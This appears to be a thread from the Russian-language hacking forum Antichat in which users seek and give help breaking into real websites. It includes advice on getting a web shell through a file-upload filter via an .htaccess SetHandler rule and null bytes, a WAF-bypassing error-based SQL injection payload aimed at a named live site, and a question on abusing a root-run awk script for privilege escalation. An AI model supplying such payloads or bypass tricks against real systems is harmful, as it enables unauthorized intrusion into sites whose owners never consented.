ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.02.2021, 01:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
Сообщение от polzunki
polzunki said:
↑
Доброго времени всем. Подскажите пожалуйста по не скольким вопросам. Есть сайт. Из админки есть возможность делать импорт в базу данных.
Возможно ли как-то получить шелл? Пути не известны.
Так же есть возможность загружать файлы, но в чистом виде .php файл грузиться не хочет.
Переименовав к примеру в .php3 загрузка происходит. С добавлением рандомного имени в конце.
Пример: wso.php3.53aadaa50075c72420b8656f14b0b68c
При переходе по ссылке, шелл не отображается, а происходит скачивание.
С этим можно что-то сделать? Заранее благодарен. конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql
по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт
Код:
Code:
SetHandler application/x-httpd-php
определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб
|
|
|
|
06.02.2021, 12:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
8405
Репутация:
7
|
|
Сообщение от lifescore
lifescore said:
↑
конечно, импорт бд - добавляем учетку + привилегии путем импорта юзера или замены. Выолнить подобное на уровне mysql маровероятно, с давних версий по дефолту ограничена скуля с работой в файловой. Если конечно речь об mysql
по аплоуду попробуй в случае апача .htaccess пропиши с расширением уже залитого файла выполнять как скрипт
Код:
Code:
SetHandler application/x-httpd-php
определяй где выполняется проверка (клаинт сайд/сервер сайд), байпасы не только на одном расширении заканчивается. Проще всего посмотреть вендра данного "чуда" и сбегать на сплойт-дб А можно ли тут через нуль байт в имени файла работать?
Это ведь, по идее, должно отрезать то, что добавляется в конце?
|
|
|
|
07.02.2021, 06:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
7581
Репутация:
0
|
|
Сообщение от qwaszx000
qwaszx000 said:
↑
А можно ли тут через нуль байт в имени файла работать?
Это ведь, по идее, должно отрезать то, что добавляется в конце? От версии php зависит.
|
|
|
|
07.02.2021, 17:49
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428
Репутация:
662
|
|
Помогите обойти ваф
Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector%5Btagevent%5D%5B%5D=25'
|
|
|
08.02.2021, 01:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
5363
Репутация:
12
|
|
Сообщение от DezMond™
DezMond™ said:
↑
Помогите обойти ваф
Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector%5Btagevent%5D%5B%5D=25'
Код:
Code:
https://www.diakoneo.de/?tx_auwpagesmeta_pagecollector[tagevent][]=25,auw_pages_meta_tag)and(extractvalue/*a*/(0x0a,user/*a*/()))%23
|
|
|
|
08.02.2021, 08:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
43449
Репутация:
1
|
|
Код:
Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_option: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}
это sql? |
|
|
|
09.02.2021, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
213865
Репутация:
72
|
|
Сообщение от brown
brown said:
↑
Код:
Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_option: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}
это sql? это json ответ по существу и конкретике ))
троллинг тут не приветствуется наверно
По сабжу, пример с этой же ORM
https://www.aldeid.com/wiki/TryHackMe-OWASP-Juice-Shop
|
|
|
|
10.02.2021, 14:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от brown
brown said:
↑
Код:
Code:
{"error":{"name":"SequelizeDatabaseError","message":"invalid input value for enum enum_user_order_entry_preferences_order_type_option: \"METAL'\"","parent":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"original":{"name":"error","length":143,"severity":"ERROR","code":"22P02","position":"63","file":"enum.c","line":"60","routine":"enum_in","sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"},"sql":"UPDATE \"user_order_entry_preferences\" SET \"order_type_option\"='METAL''',\"updated_at\"='2021-02-08 04:38:57.370 +00:00' WHERE \"id\" = '2119'"}}
это sql? Похоже, что это не инъекция. ORM сообщает, что значение невалидно, т.е. нет в перечисляемом типе. Остальное, а конкретно вид SQL запроса, скорее всего испольуется для наглядной отладки, не более того.
|
|
|
|
11.02.2021, 12:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
1521
Репутация:
0
|
|
Здравствуйте, есть актуальная программа, которая проверит порты на наличие уязвимостей?
|
|
|
|
16.02.2021, 14:31
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
Код:
Code:
sh -c grep SYN_RECV /tmp/check_ddos.res | awk {'print $5'}
Есть такой скрипт от рута, кто хорошо дружит с AWK подскажите есть ли возможность исполнить свой код, или записать в файл данные подставленные в $5? При условии что Файл доступен на запись
из man awk:
Код:
Code:
print Print the current record. The output record is terminated with the value of ORS.
print expr-list Print expressions. Each expression is separated by the value of OFS. The output record is terminated with the value of ORS.
print expr-list >file Print expressions on file. Each expression is separated by the value of OFS. The output record is terminated with the value of
ORS.
printf fmt, expr-list Format and print. See The printf Statement, below.
printf fmt, expr-list >file
Format and print on file.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
